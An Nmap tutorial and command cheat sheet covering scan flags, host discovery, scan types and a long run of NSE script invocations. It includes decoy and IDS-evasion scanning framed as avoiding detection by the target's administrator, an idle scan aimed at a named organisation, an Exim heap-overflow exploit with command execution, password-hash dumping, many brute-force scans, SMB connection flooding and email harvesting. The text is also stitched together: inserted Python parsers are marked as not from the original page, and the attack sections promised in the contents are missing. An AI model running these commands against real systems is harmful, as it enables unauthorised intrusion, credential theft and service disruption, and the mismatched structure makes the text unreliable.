Nmap is a great tool for discovering the network services and ports that your server exposes to the network. In this guide we cover basic information, network scanning and advanced techniques, showing how to use one of the most powerful and flexible network scanners available.
1 NMAP Flags
2 Common Nmap Uses
3 Scan Types
4 Scan by using NSE Scripts
5 NMAP Attack Examples
5.1 Privilege Escalation
5.2 NMAP the Target Network
5.3 Auditing Remote Desktop Passwords with NMAP and Ncrack
5.4 Hacking Windows 7 with NMAP and Metasploit


  • sudo nmap -T4 -A -sV -p 1-65535 <Target IP>
  • sudo nmap -T4 -A -v -p 1-65535 <Target IP> Ref: SEC-2259
  • sudo nmap -n -vv -A <Target IP> --min-parallelism=50 --max-parallelism=150 -PN -T2 -oA <Target IP> Ref: SEC-2264

1 NMAP Flags

-sL List Scan (List Targets Only, No Scan)
-sn Ping Scan (Disable Port Scan)
-sS SYN Scan
-sT TCP Connect Scan
-sP Ping Scan (Older Name for -sn)
-sU UDP Scan
-sO IP Protocol Scan
-b <FTP relay host> FTP Bounce Scan
-sN TCP Null Scan
-sF FIN Scan
-sX Xmas Scan
-sA ACK Scan
-sW TCP Window Scan
-sR RPC Scan (Deprecated; Now Part of -sV)
-sI <zombie host[:probeport]> Idle Scan
-sV Probe Open Ports to Determine Service/Version Info
-sC Default Script Scan (Equivalent to --script=default)
-A Enable OS Detection, Version Detection, Script Scanning, and Traceroute

-Pn Treat All Hosts as Online (Skip Host Discovery)
-PN Older Spelling of -Pn (Still Accepted)
-PS/-PA/-PU/-PY[portlist] TCP SYN/ACK, UDP or SCTP Discovery to Specified Ports
-PE/-PP/-PM ICMP Echo, Timestamp, and Netmask Request Discovery Probes
-n / -R Never do DNS Resolution / Always Resolve [Default: Sometimes]
--dns-servers <serv1[,serv2],...> Specify Custom DNS Servers
--system-dns Use the OS's DNS Resolver
--traceroute Trace Hop Path to Each Host

-F Fast Mode (Scan Fewer Ports than the Default)
-p <Port Range> Only Scan the Specified Ports
-O OS Detection
-T<0-5> Timing Template (Higher is Faster)

-f; --mtu <val> Fragment Packets (Optionally with Specified MTU)
-D <decoy1,decoy2[,ME],...> Cloak a Scan with Decoys
-S <IP_Address> Spoof Source Address
-e <iface> Use Specified Network Interface
-g <portnum> Use Specified Source Port Number
--data-length <num> Append Random Data to Sent Packets
--ip-options <options> Send Packets with Specified IP Options
--ttl <val> Set IP Time-To-Live Field
--spoof-mac <MAC Address/Prefix/Vendor Name> Spoof your MAC Address
--badsum Send Packets with a Bogus TCP/UDP/SCTP Checksum

-oN/-oX/-oS/-oG <file> Output Scan in Normal, XML, s|<rIpt kIddi3, and Grepable Format, respectively, to the Specified File
-oA <basename> Output in the Three Major Formats at Once
-v Increase Verbosity Level (-vv or More for Greater Verbosity)
-d Increase Debugging Level (-dd or More for Greater Detail)
--reason Display the Reason a Port is in a Particular State
--open Only Show Open (or Possibly Open) Ports
--packet-trace Show All Packets Sent and Received
--iflist Print Host Interfaces and Routes (for Debugging)
--log-errors Log Errors/Warnings to the Normal-Format Output File
--append-output Append to Rather than Clobber Specified Output Files
--resume <filename> Resume an Aborted Scan

-iL <Input FileName> Input Targets from a List of Hosts in the Specified File
-iR <Num Hosts> Choose Random Targets
--exclude <host1[,host2][,host3],...> Exclude Hosts / Networks
--excludefile <exclude_file> Exclude List of Hosts / Networks from File

2 Common Nmap Uses

Full Scan:
nmap -p1-5000 -T4 -sS

Use a Decoy when Scanning Ports to Avoid getting Caught by the SysAdmin
This will show the Decoy IP Address instead of your IP in the target's security logs. The Decoy IP Address needs to be alive.
Check the target's security log (/var/log/secure) to make sure it worked.
nmap -sS -D

Scan the Same Network for All the Services in /etc/services (All of the Reserved Ports) via Very Fast TCP Scan:
nmap -F warez.com/24

Port Scan:
nmap target
nmap -v -sT
ncat -v -l -p 111
for i in {21..29}; do nc -v -n -z -w 1 192.168.0.$i 443; done

Ping Scan (or Ping Sweep) of a Subnet:
nmap -sP
for i in {1..254}; do ping -c 1 -W 1 10.1.1.$i | grep 'from'; done

Get List of Servers with a Specific Port Open through a TCP Connect Scan (Slower and with More Overhead than a SYN Scan):
nmap -sT -p 80 -oG - 192.168.1.* | grep open
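As an added example that is not part of the original page, the following Python script parses the grepable (-oG) output the pipeline above relies on and selects hosts whose port state is exactly `open`, which a plain `grep open` does not guarantee (it also matches `open|filtered`). The sample report is constructed; the same parser covers the IP-extraction step used later in section 5.3.

```python
"""Parse Nmap grepable (-oG) output and list hosts with a given port open."""
import re
from collections import defaultdict

# Constructed sample of `nmap -sT -p 22,80 -oG - 192.168.1.0/24` output (not a real scan).
# Fields in a -oG line are tab-separated; each Ports entry is
# port/state/protocol/owner/service/rpcinfo/version/
SAMPLE_GNMAP = """\
# Nmap 7.94 scan initiated Tue Jan  9 10:00:00 2024 as: nmap -sT -p 22,80 -oG - 192.168.1.0/24
Host: 192.168.1.1 ()\tStatus: Up
Host: 192.168.1.1 ()\tPorts: 22/closed/tcp//ssh///, 80/open/tcp//http///
Host: 192.168.1.2 (web.lan)\tStatus: Up
Host: 192.168.1.2 (web.lan)\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///
Host: 192.168.1.3 ()\tStatus: Up
Host: 192.168.1.3 ()\tPorts: 22/filtered/tcp//ssh///, 80/open|filtered/tcp//http///
# Nmap done at Tue Jan  9 10:00:05 2024 -- 256 IP addresses (3 hosts up) scanned in 5.01 seconds
"""

HOST_RE = re.compile(r"^Host:\s+(\S+)\s+\(([^)]*)\)")


def parse_grepable(text):
    """Return {ip: {"hostname": str, "ports": [(port, state, proto, service), ...]}}."""
    hosts = defaultdict(lambda: {"hostname": "", "ports": []})
    for line in text.splitlines():
        if line.startswith("#"):
            continue  # scan header/footer comment lines
        m = HOST_RE.match(line)
        if not m:
            continue
        ip, hostname = m.group(1), m.group(2)
        entry = hosts[ip]
        if hostname:
            entry["hostname"] = hostname
        for field in line.split("\t")[1:]:
            if not field.startswith("Ports:"):
                continue  # e.g. "Status: Up" or "Ignored State: closed (998)"
            for spec in field[len("Ports:"):].strip().split(", "):
                parts = spec.split("/")
                if len(parts) < 5:
                    continue
                entry["ports"].append((int(parts[0]), parts[1], parts[2], parts[4]))
    return dict(hosts)


def hosts_with_open_port(text, port, proto="tcp"):
    """IPs where port/proto is exactly 'open'; 'open|filtered' (which `grep open` also matches) is excluded."""
    result = []
    for ip, entry in parse_grepable(text).items():
        if any(p == port and st == "open" and pr == proto for p, st, pr, _ in entry["ports"]):
            result.append(ip)
    # sort numerically by octet rather than as strings
    return sorted(result, key=lambda ip: tuple(int(o) for o in ip.split(".")))


if __name__ == "__main__":
    for ip in hosts_with_open_port(SAMPLE_GNMAP, 80):
        print(ip)
```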

List of reverse DNS records for a subnet:
nmap -R -sL | awk '{if($3=="not")print"("$2") no PTR";else print$3" is "$2}' | grep '('

Find Duplicate Addresses in a Subnet (arping -D exits non-zero when another host answers for the address):
for i in $(seq 1 254); do arping -q -D -I eth0 -c 2 192.168.1.${i} || echo "192.168.1.${i} duplicate"; done

Find All of the Active IP Addresses in a Subnet (by using Ping Scan):
nmap -sP 192.168.0.*
nmap -sP -R |grep up
nmap -sP -PR 192.168.0.*
nmap -sP > lanscan.txt
nmap -sP; arp -n | grep "192.168.1.[0-9]* *ether"
ping -c2 >/dev/null; arp -a
arp-scan -l
arp-scan -I eth0

nmap -v -sP

for ip in $(seq 1 254); do ping -c 1 192.168.1.$ip >/dev/null; [ $? -eq 0 ] && echo "192.168.1.$ip UP" || : ; done
for ip in $(seq 1 254); do nslookup 192.168.1.$ip; [ $? -eq 0 ] && echo "192.168.1.$ip UP" || : ; done

OR on Windows:
for /L %i in (1,1,254) do ping -n 1 10.254.254.%i | find /i "Reply" >> c:\ipaddresses.txt

OR Faster:
nmap -sP | grep -oE '([[:digit:]]{1,3}\.){3}[[:digit:]]{1,3}'

Find All of the Active Hosts in the Adjacent Class C's 193.14.12, .13, .14, .15, ..., .30:
nmap -P '193.14.[12-30].*'

OR, If you don’t want to have to quote it to avoid shell interpretation:
nmap -P 193.14.12-30.0-255

Find All Unused IP Addresses in a Subnet:
nmap -sP -R |grep down

nmap -T4 -sP && egrep "00:00:00:00:00:00" /proc/net/arp

fping -g 2>/dev/null
fping -g 2>/dev/null | grep 'is unreachable' | cut -d ' ' -f 1 | sort -t '.' -k 4 -n

How Many Linux and Windows Devices Are On Your Network?
nmap -F -O | grep "Running: " > /tmp/os; echo "$(grep -c Linux /tmp/os) Linux device(s)"; echo "$(grep -c Windows /tmp/os) Windows device(s)"

OS Detection Scan:
With so many different operating systems and versions around, it is really interesting how Nmap detects the operating system of a target in a very short time. Let us study the OS detection command in detail.

Table 1: Analysing the output of an OS detection scan

| Item | Interpretation |
|------|----------------|
| nmap -O -v -oN versiondetect.txt | Syntax of the executed command; -v increases the verbosity of the output. |
| Initiating OS detection (try #1) against | OS detection uses a combination of ICMP echo, TCP and UDP packets. |
| Host is up (0.0030s latency). | Discovered the host status in practically no time. |
| Interesting ports on | Lists the detected open ports on the host. |
| Not shown: 997 closed ports | |
| 135/tcp open msrpc | |
| 139/tcp open netbios-ssn | |
| 445/tcp open microsoft-ds | |
| MAC Address: 00:16:76:CE:8C:3C (Intel) | MAC address of the host's Ethernet card, and its manufacturer. |
| Device type: general purpose | With at least one open and one closed port on the target host, Nmap can detect the target OS effectively. To make Nmap attempt OS detection only against such hosts, and so save scan time, use the --osscan-limit option. |
| Running: Microsoft Windows XP | |
| OS details: Microsoft Windows XP SP2 or SP3 or Windows Server 2003 | |
| Network Distance: 1 hop | The host is in the same network. |
| TCP Sequence Prediction: Difficulty=264 (Good luck!) | The TCP three-way handshake is initiated by a SYN packet carrying an initial sequence number (ISN). If that number can be predicted, an attacker can construct a spoofed packet that appears to have been sent by the scanned host. This value denotes the difficulty of predicting the ISN. |
| IP ID Sequence Generation: Incremental | How the host generates IP ID values; an incremental sequence is the property an idle scan (-sI) requires of a zombie host. |
| Read data files from: /usr/share/nmap | Location of the Nmap data files used for the scan. |
| OS detection performed. Please report any incorrect results at http://nmap.org/submit/. | Gives the user a chance to submit incorrect OS detection results to the Nmap team, for improvements in the next version. |
| # Nmap done at Tue Nov 30 20:13:03 2010 -- 1 IP address (1 host up) scanned in 3.56 seconds | Completed the whole OS detection for one host in less than 4 seconds! |

Security by obscurity? Assuming you are a Web developer, would you be interested in running an httpd service on a non-standard TCP port, say 1793, rather than on the standard TCP port 80? In the early days, before I knew enough about the various Nmap scan techniques, I thought this was incredible: I felt I had found a gold mine! Surely a service running on a non-standard port adds a great layer of security?

Welcome to the world of Nmap, which detects practically any service, even one running on a non-standard port.
Table 2 shows Nmap scan output against a live IPCop firewall with its Web interface configured on TCP port 1775. By default, IPCop runs the SSH service on the non-standard TCP port 222 (rather than the standard SSH port 22). The output is filtered.


OS Detection and Port Probe Scan against an IPCop Firewall on Ports 222 and 1775 (using the -PN Option as the Ping Response could be Disabled on the Host/Firewall):
nmap -v -O -PN -p 222,1775 -sV -oN IPCopOS.txt 121.xxx.xxx.xxx
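As an added example, not from the original article or from the IPCop project, this Python script reads the XML report (-oX) of a version-detection scan like the one above and flags open ports whose service was actually fingerprinted by -sV (`method="probed"`) on a port other than its conventional one. The sample report and the STANDARD_PORTS table are constructed assumptions mirroring the IPCop case (SSH on 222, web interface on 1775).

```python
"""Flag services that -sV identified on non-standard ports, from Nmap -oX output."""
import xml.etree.ElementTree as ET

# Constructed sample of `nmap -sV -p 22,80,222,1775 -oX - 192.0.2.10` output (not a real scan).
# Note that closed ports still carry a <service> element, but with method="table":
# Nmap only looked the name up by port number and confirmed nothing.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -p 22,80,222,1775 -oX - 192.0.2.10">
<host><status state="up" reason="arp-response"/>
<address addr="192.0.2.10" addrtype="ipv4"/>
<ports>
<port protocol="tcp" portid="22"><state state="closed" reason="reset"/><service name="ssh" method="table" conf="3"/></port>
<port protocol="tcp" portid="80"><state state="closed" reason="reset"/><service name="http" method="table" conf="3"/></port>
<port protocol="tcp" portid="222"><state state="open" reason="syn-ack"/><service name="ssh" product="OpenSSH" version="4.3" method="probed" conf="10"/></port>
<port protocol="tcp" portid="1775"><state state="open" reason="syn-ack"/><service name="http" product="Apache httpd" method="probed" conf="10"/></port>
</ports>
</host>
</nmaprun>
"""

# Ports on which each service is conventionally expected (an assumption for this example).
STANDARD_PORTS = {"ssh": {22}, "http": {80, 8080}, "https": {443}, "smtp": {25, 587}}


def open_services(xml_text):
    """Return [(ip, port, proto, service, method)] for every open port in the report.

    `method` is "probed" when -sV fingerprinted the service by talking to it and
    "table" when Nmap merely guessed it from the port number (nmap-services).
    """
    root = ET.fromstring(xml_text)
    found = []
    for host in root.iter("host"):
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        ip = addr.get("addr")
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue
            svc = port.find("service")
            name = svc.get("name", "") if svc is not None else ""
            method = svc.get("method", "table") if svc is not None else "table"
            found.append((ip, int(port.get("portid")), port.get("protocol"), name, method))
    return found


def nonstandard_port_services(xml_text, standard=STANDARD_PORTS):
    """Open ports whose *probed* service does not sit on one of its conventional ports."""
    flagged = []
    for ip, port, proto, name, method in open_services(xml_text):
        if method != "probed":
            continue  # a table lookup just restates the port number; nothing was confirmed
        if name in standard and port not in standard[name]:
            flagged.append((ip, port, proto, name))
    return flagged


if __name__ == "__main__":
    for ip, port, proto, name in nonstandard_port_services(SAMPLE_XML):
        print(f"{ip}:{port}/{proto} runs {name} on a non-standard port")
```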

Find Rogue AP on a Subnet:
nmap -A -p1-85,113,443,8080-8100 -T4 --min-hostgroup 50 --max-rtt-timeout 2000 --initial-rtt-timeout 300 --max-retries 3 --host-timeout 20m --max-scan-delay 1000 -oA wapscan

Find the Conficker Virus on a Subnet (using the -PN Option as the Ping Response could be Disabled on Host/Firewall):
nmap -PN -T4 -p139,445 -n -v --script=smb-check-vulns --script-args safe=1

SNMP Win32 Users Scan:
nmap -sV -sC

Scan 4096 IP Addresses for Any Web Servers (without pinging them) and Save Output in grepable and XML formats (using the -Pn Option to Skip Pinging the Targets):
nmap -Pn -p80 -oX logs/pb-port80scan.xml -oG logs/pb-port80scan.gnmap

Scan the Specified Subnet for NetBIOS Information:
nbtscan -v -m 2

Get Current Host Public IP:
alias myip='curl -s http://checkrealip.com/ | grep "Current IP Address"'

Complete a TCP Handshake on a Specified Host and Port:
nc -zvw 1 host port

IDS Evasion Attack:
nmap -sS -PN -p80,443 -T1

Confuse IDS / IPS by sending requests with decoy’s or different IP address:
nmap -sS -D 234.34.34.45,ME -p 80 www.xyz.com

Get SMB Server Time:
nmap --script=smb-os-discovery.nse xxx.xxx.xxx.xxx/24 -p 139,445 | grep "System time" | sort -r

3 Scan Types

Stealth Scan of the Entire Class "B" Network for the IMAP Daemon (older Nmap syntax, not accepted by current versions):
nmap -Up 143

Stealth SYN Scan with OS Detection on the Specified Network:
nmap -sS -O scanme.nmap.org/24

ACK Scan of TCP Ports 1-1000 (using the -PN Option as the Ping Response could be Disabled on the Host/Firewall; note that an ACK scan classifies ports as filtered or unfiltered, it does not report them as open):
nmap -PN -sA -vv -n -p1-1000 -T4 -oN NmapACKScan.txt 117.X.X.X

TCP Connect Scan for Open TCP Ports (using the -PN Option as the Ping Response could be Disabled on the Host/Firewall):
nmap -PN -sT -vv -n -p1-1000 -T4 -oN NmapTCPConnect.txt 117.X.X.X

Version Detection Scan and Host Enumeration on the Specified Ports and IP Address Range
nmap -sV -p 22,53,110,143,4564 198.116.0-255.1-127

SYN Scan to Get Info about Remote Host Ports and OS Detection:
nmap -sS -P0 -sV -O <target>

Fragmented SYN Scan for Open TCP Ports (using the -PN Option as the Ping Response could be Disabled on Host/Firewall):
nmap -PN -sS -f -vv -n -p1-1000 -T4 --max-rtt-timeout 15 -oN NmapSYNScan.txt 117.X.X.X

Fragmented SYN Scan of the Class "C" Network on which warez.com Sits for Popular Services (older Nmap syntax; in current Nmap: nmap -f -sS -p 21,22,23,25,80,110 warez.com/24):
nmap -fsp 21,22,23,25,80,110 warez.com/24

XMAS Tree Scan on the Specified Subnet:
nmap -v -sX

FIN Scan on the Specified Subnet:
nmap -v -sF

TCP Null Scan on the Specified Subnet:
nmap -v -sN

TCP Windows Scan on the Specified Subnet:
nmap -v -sW

TCP RPC Scan on the Specified Subnet:
nmap -v -sR

FTP Bounce Attack Scan (Scan secret.pathetic.net using the FTP Bounce Attack off of ftp.pathetic.net; older Nmap syntax, in current Nmap: nmap -b ftp.pathetic.net secret.pathetic.net):
nmap -Db ftp.pathetic.net secret.pathetic.net

UDP Scan and TCP Connect Scan for Open Ports (Firewall Scan from Inside the Network):
nmap -vv -sU -sT -p1-1000 -n -r -T4 -oN NmapIPCopInternal.txt

Idle Scan against the RIAA by providing a Zombie (kiosk.adobe.com):
nmap -P0 -p- -sI kiosk.adobe.com www.riaa.com

Stealth Idle Scan with Packet Trace:
nmap -sI Zombie -Pn -p20-25,110 -r --packet-trace -v Target

4 Scan by using NSE Scripts

The Nmap Scripting Engine (NSE) is one of Nmap's most powerful and flexible features. It allows users to write and share scripts that automate a wide variety of networking tasks.
Those scripts are written in the embedded Lua programming language and are executed in parallel.
Users can rely on the growing and diverse set of scripts distributed with Nmap, or write their own to meet custom needs.
The official Nmap NSE script and Lua library portal lets you browse and download the scripts by category or alphabetically by name.

Below are many useful examples of running Nmap scans with NSE scripts.

Sniffer Detection on the Hosts Listed in the Specified File of IP Addresses:
nmap --script sniffer-detect -iL IPList.txt -oN sniffer-detect.txt

Perform Firewalking (Discover Firewall Rules using an IP TTL Expiration Technique):
nmap --script=firewalk --traceroute <host>
nmap --script=firewalk --traceroute --script-args=firewalk.max-retries=1 <host>
nmap --script=firewalk --traceroute --script-args=firewalk.probe-timeout=400ms <host>
nmap --script=firewalk --traceroute --script-args=firewalk.max-probed-ports=7 <host>

Detects a Vulnerability in Netfilter and other Firewalls that use Helpers to dynamically Open Ports for Protocols such as FTP and SIP:
nmap --script firewall-bypass <target>
nmap --script firewall-bypass --script-args firewall-bypass.helper="ftp",firewall-bypass.targetport=22 <target>

Perform a DNS Fuzzing Attack against a DNS Server:
nmap --script dns-fuzz --script-args timelimit=2h

Perform Form Fuzzing against Forms on Web Sites:
nmap --script http-form-fuzzer -p 80

Crawls a Web Server and Sends an Attack Vector/Probe to Find PHP Files Vulnerable to Reflected Cross-Site Scripting via the Variable $_SERVER["PHP_SELF"].
PHP_SELF XSS Refers to Vulnerabilities caused by the Lack of Sanitisation of the Variable $_SERVER["PHP_SELF"], commonly used in PHP Scripts that display Forms.
The Vector/Probe used is /'"/><script>alert(1)</script>
nmap --script=http-phpself-xss -p80 <target>
nmap -sV --script http-phpself-xss <target>

Checks if a VNC Server is Vulnerable to the RealVNC Authentication Bypass (CVE-2006-2369):
nmap -sV --script realvnc-auth-bypass.nse
nmap -sV -sC --script realvnc-auth-bypass

Oracle 11g Users Scan (bug fixed in Oracle's October 2009 Critical Patch Update):
nmap --script oracle-enum-users --script-args oracle-enum-users.sid=ORCL,userdb=orausers.txt -p 1521-1560

Dumps the Password Hashes from a MySQL Server in a Format Suitable for Cracking by Tools such as John the Ripper:
nmap -p 3306 --script mysql-dump-hashes --script-args='username=root,password=secret'

MySQL Server Users Scan:
nmap -sV --script mysql-users

Brute Force MySQL Passwords:
nmap --script=mysql-brute

Run a Query against a MySQL Database and Return the Results as a Table:
nmap -p 3306 --script mysql-query --script-args='query="SELECT * FROM table_name WHERE (userID LIKE '%ELM%');"[,username=root,password=secret]'
nmap -p 3306 --script mysql-query --script-args='query="GRANT ALL PRIVILEGES ON db_base.* TO db_user@'%' IDENTIFIED BY 'db_passwd';"[,username=root,password=secret]'
nmap -p 3306 --script mysql-query --script-args='query="INSERT INTO table_name (status, permissions) VALUES ('OK','ALL') WHERE (userID LIKE '%ELM%');"[,username=root,password=secret]'

Dumps the Password Hashes from a Microsoft SQL Server (ms-sql) in a Format Suitable for Cracking by Tools such as John the Ripper:
nmap -p 1433 --script ms-sql-dump-hashes

Attempts to Authenticate to Microsoft SQL Servers using an Empty Password for the Sysadmin (sa) Account:
nmap -p 445 --script ms-sql-empty-password --script-args mssql.instance-all
nmap -p 445 --script ms-sql-empty-password --script-args mssql.instance-name=PRDB,mssql.instance-port=1432
nmap -p 1433 --script ms-sql-empty-password

Queries Microsoft SQL Server (ms-sql) Instances for a List of Databases a User has Access to:
nmap -p 1433 --script ms-sql-hasdbaccess --script-args mssql.username=sa,mssql.password=sa
nmap -p 1433 --script ms-sql-hasdbaccess --script-args mssql.username=sa,mssql.password=sa,mssql.instance-all
nmap -p 1433 --script ms-sql-hasdbaccess --script-args mssql.username=sa,mssql.password=sa,mssql.instance-name=PRDB,mssql.instance-port=1432

Retrieves the Authentication Scheme and Realm of a Web Service that Requires Authentication:
nmap --script http-auth [--script-args http-auth.path=/login] -p80

Scan for Access with Default Credentials used by a Variety of Web Applications and Devices:
nmap -p80 --script http-default-accounts

Scan whether a JBoss Server is Vulnerable to JMX Console Authentication Bypass (CVE-2010-0738):
nmap --script=http-vuln-cve2010-0738 --script-args 'http-vuln-cve2010-0738.paths={/path1/,/path2/}'

Discovers Valid Usernames by Brute-Force Querying Likely Usernames against a Kerberos Service:
nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='test'

Checks Target IP Addresses against Multiple DNS Anti-Spam and Open Proxy Blacklists and Returns a List of Services for which an IP has been Flagged.
Checks may be Limited by Service Category (e.g. SPAM, PROXY) or to a Specific Service Name.
nmap --script dns-blacklist --script-args='dns-blacklist.ip='
nmap -sn --script dns-blacklist

Detects whether the Remote Device has IP Forwarding or "Internet Connection Sharing" Enabled, by Sending an ICMP Echo Request to a Given Target using the Scanned Host as Default Gateway:
nmap -sn --script ip-forwarding --script-args='target=www.example.com'

Extracts a List of Citrix Servers from the ICA Browser Service:
nmap -sU --script=citrix-enum-servers -p 1604

Extracts a List of Applications, ACLs, and Settings from the Citrix XML Service:
nmap --script=citrix-enum-apps-xml -p 80,443,8080

Check if the ePO Agent is Running on Port 8081 or on a Port Identified as the ePO Agent Port:
nmap -sV --script=mcafee-epo-agent

Check for the Presence of the MS12-020 RDP Vulnerability:
nmap -sC -p 3389 -vv --script-trace --script ms12-020-rev.nse

Attempts to Perform an LDAP Search and Returns All Matches:
nmap -p 389 --script ldap-search --script-args 'ldap.username="cn=ldaptest,cn=users,dc=cqure,dc=net",ldap.password=ldaptest,

nmap -p 389 --script ldap-search --script-args 'ldap.username="cn=ldaptest,cn=users,dc=cqure,dc=net",ldap.password=ldaptest,ldap.qfilter=custom,ldap.searchattrib="operatingSystem",ldap.searchvalue="Windows *Server*",ldap.attrib={operatingSystem,whencreated,OperatingSystemServicePack}'

Retrieves the LDAP Root DSA-Specific Entry (DSE):
nmap -p 389 --script ldap-rootdse

Lists Remote File Systems by Querying the Remote Device using the Network Data Management Protocol (NDMP).
NDMP is a Protocol Intended to Transport Data between a NAS Device and the Backup Device, Removing the Need for the Data to Pass through the Backup Server.
nmap -p 10000 --script ndmp-fs-info

Retrieves Configuration Information from a Lexmark S300-S400:
nmap -sV --script=lexmark-config

Lotus Domino Users Scan:
nmap --script domino-enum-users -p 1352

Scan for an identd (auth) Server which is Spoofing its Replies:
nmap -sV --script=auth-spoof

Looks for Signatures of Known Server Compromises:
nmap -sV --script=http-malware-host

Checks if Hosts are on Google's Blacklist of Suspected Malware and Phishing Servers.
The Script Queries Google's Safe Browsing Service; you need your own API Key to access the Safe Browsing Lookup Service.
Sign up for yours at http://code.google.com/apis/safebrowsing/key_signup.html.
nmap -p80 --script http-google-malware

Scan for the Presence of the vsFTPd 2.3.4 Backdoor reported on 2011-07-04 (CVE-2011-2523):
nmap --script ftp-vsftpd-backdoor -p 21

Scan for the Presence of the ProFTPD 1.3.3c Backdoor reported as OSVDB-ID 69562:
nmap --script ftp-proftpd-backdoor -p 21

Brute Force Password Scan against the WinPcap Remote Capture Daemon (rpcap):
nmap -p 2002 --script rpcap-brute

Brute Force Password Scan against rsync:
nmap -p 873 --script rsync-brute --script-args 'rsync-brute.module=www'

Brute Force Password Scan against the VMware Authentication Daemon (vmware-authd):
nmap -p 902 --script vmauthd-brute

Brute Force Password Scan against VNC Servers:
nmap --script vnc-brute -p 5900

Brute Force Password Scan against SMTP using LOGIN, PLAIN, CRAM-MD5, DIGEST-MD5 or NTLM:
nmap -p 25 --script smtp-brute

Brute Force Password Scan against the rlogin Service:
nmap -p 513 --script rlogin-brute

Brute Force Password Scan against POP3 Servers using either "USER" (default), "SASL-PLAIN", "SASL-LOGIN", "SASL-CRAM-MD5", or "APOP":
nmap -sV --script=pop3-brute

Brute Force Password Scan against IMAP Servers using either LOGIN, PLAIN, CRAM-MD5, DIGEST-MD5 or NTLM Authentication:
nmap -p 143,993 --script imap-brute

Scan for and/or Exploit a Heap Overflow in Versions of Exim prior to 4.69 (CVE-2010-4344) and a Privilege Escalation Vulnerability in Exim 4.72 and below (CVE-2010-4345).
The Heap Overflow allows Remote Attackers to Execute Arbitrary Code with the Privileges of the Exim Daemon (CVE-2010-4344). If the Exploit fails, the Exim smtpd Child will be Killed (Heap Corruption).
The Privilege Escalation Vulnerability allows the exim User to gain root Privileges by Specifying an Alternate Configuration File using the -C Option (CVE-2010-4345).
nmap --script=smtp-vuln-cve2010-4344 --script-args="smtp-vuln-cve2010-4344.exploit" -pT:25,465,587
nmap --script=smtp-vuln-cve2010-4344 --script-args="exploit.cmd='uname -a'" -pT:25,465,587

Detects PHP-CGI Installations Vulnerable to CVE-2012-1823, a Critical Vulnerability that Allows Attackers to Retrieve Source Code and Execute Code Remotely.
The Script works by Appending "?-s" to the URI to make Vulnerable php-cgi Handlers return Colour Syntax-Highlighted Source. It uses the Pattern "<span style=.*>&lt;?" to Detect Vulnerable Installations.
nmap -sV --script http-vuln-cve2012-1823
nmap -p80 --script http-vuln-cve2012-1823 --script-args http-vuln-cve2012-1823.uri=/test.php

Scan a Web Server for Slowloris DoS Vulnerability:
nmap --script http-slowloris --max-parallelism 400

Exhausts a Remote SMB Server's Connection Limit by Opening as Many Connections as it can.
Most Implementations of SMB have a Hard Global Limit of 11 Connections for User Accounts and 10 Connections for Anonymous.
Once that Limit is Reached, further Connections are Denied. This Script Exploits that Limit by Taking up All the Connections and Holding them.
This works better with a Valid User Account, because Windows reserves one Slot for Valid Users.
nmap --script smb-flood.nse -p445
nmap -sU -sS --script smb-flood.nse -p U:137,T:139

Detects Huawei Modem Models HG530x, HG520x, HG510x (and others) Vulnerable to a Remote Credential and Information Disclosure Vulnerability. It also Extracts the PPPoE Credentials and Other Interesting Configuration Values.
nmap -p80 --script http-huawei-hg5xx-vuln <target>
nmap -sV --script http-huawei-hg5xx-vuln <target>

Scan to Discover Hosts in the Local Network using the DNS Service Discovery Protocol, Sending a NULL UDP Packet to Each Host to Test if it is Vulnerable to the Avahi NULL UDP Packet Denial of Service (CVE-2011-1002):
nmap --script=broadcast-avahi-dos

Exploits the CVE-2012-3137 Vulnerability, a Weakness in Oracle's O5LOGIN Authentication Scheme:
nmap --script oracle-brute-stealth -p 1521 --script-args oracle-brute-stealth.sid=ORCL

Guesses Oracle Instance/SID Names against the TNS Listener:
nmap --script=oracle-sid-brute --script-args=oraclesids=/path/to/sidfile -p 1521-1560
nmap --script=oracle-sid-brute -p 1521-1560

Brute Force Password Scan against the Nessus Vulnerability Scanning Daemon using the NTP 1.2 Protocol:
nmap --script nessus-brute -p 1241

acarsd Scan on the Specified Port and Host/Network:
nmap --script acarsd-info --script-args "acarsd-info.timeout=10,acarsd-info.bytes=512" -p <port>

Brute Force Password Scan against an FTP Server:
nmap --script ftp-brute -p 21

Scan an FTP Server for Anonymous Login:
nmap -sV --script ftp-anon

Spiders a Web Site and Collects E-mail Addresses:
nmap --script=http-email-harvest

Checks for a Path Traversal Vulnerability in VMware ESX, ESXi, and Server (CVE-2009-3733):
nmap --script http-vmware-path-vuln -p80,443,8222,8333

Retrieves Information from an Apache Hadoop Secondary NameNode HTTP Status Page:
nmap --script hadoop-secondary-namenode-info -p 50090

Retrieves Information from an Apache Hadoop NameNode HTTP Status Page:
nmap --script hadoop-namenode-info -p 50070

Discovers Hostnames that Resolve to the Target's IP Address by Querying the Robtex Service at http://www.robtex.com/dns/:
nmap --script hostmap-robtex

Retrieves the Locations of All "Find my iPhone" Enabled iOS Devices by Querying the MobileMe Web Service:
nmap -sn -Pn --script http-icloud-findmyiphone --script-args='username=<user>,password=<pass>'

Brute Force Password Scan against an HTTP Server (Basic Authentication, Default Method GET):
nmap --script http-brute -p 80

Brute Force Password Scan against an HTTP Server (Form-Based Authentication):
nmap --script http-form-brute -p 80

Brute Force Password Auditing against Joomla Web CMS Installations:
nmap -sV --script http-joomla-brute --script-args 'userdb=users.txt,passdb=passwds.txt,http-joomla-brute.hostname=domain.com,http-joomla-brute.threads=3,brute.firstonly=true'
nmap -sV --script http-joomla-brute

Brute Force Password Scan against an HTTP Proxy Server:
nmap --script http-proxy-brute -p 8080

Brute Force Password Auditing against the BackOrifice Service:
nmap -sU --script backorifice-brute --script-args backorifice-brute.ports="U:31337,25252,151-222"
nmap -sU --script backorifice-brute --script-args backorifice-brute.ports="U:1024-1512"

Brute Force LDAP Authentication:
nmap -p 389 --script ldap-brute --script-args ldap.base='"cn=users,dc=cqure,dc=net"' <host>

Brute Force Passwords against an iSCSI Target:
nmap -sV --script=iscsi-brute

Brute Force Passwords against a WordPress CMS/Blog Server:
nmap -sV --script http-wordpress-brute
nmap -sV --script http-wordpress-brute --script-args 'userdb=users.txt,passdb=passwds.txt,http-wordpress-brute.hostname=domain.com,http-wordpress-brute.threads=3,brute.firstonly=true'

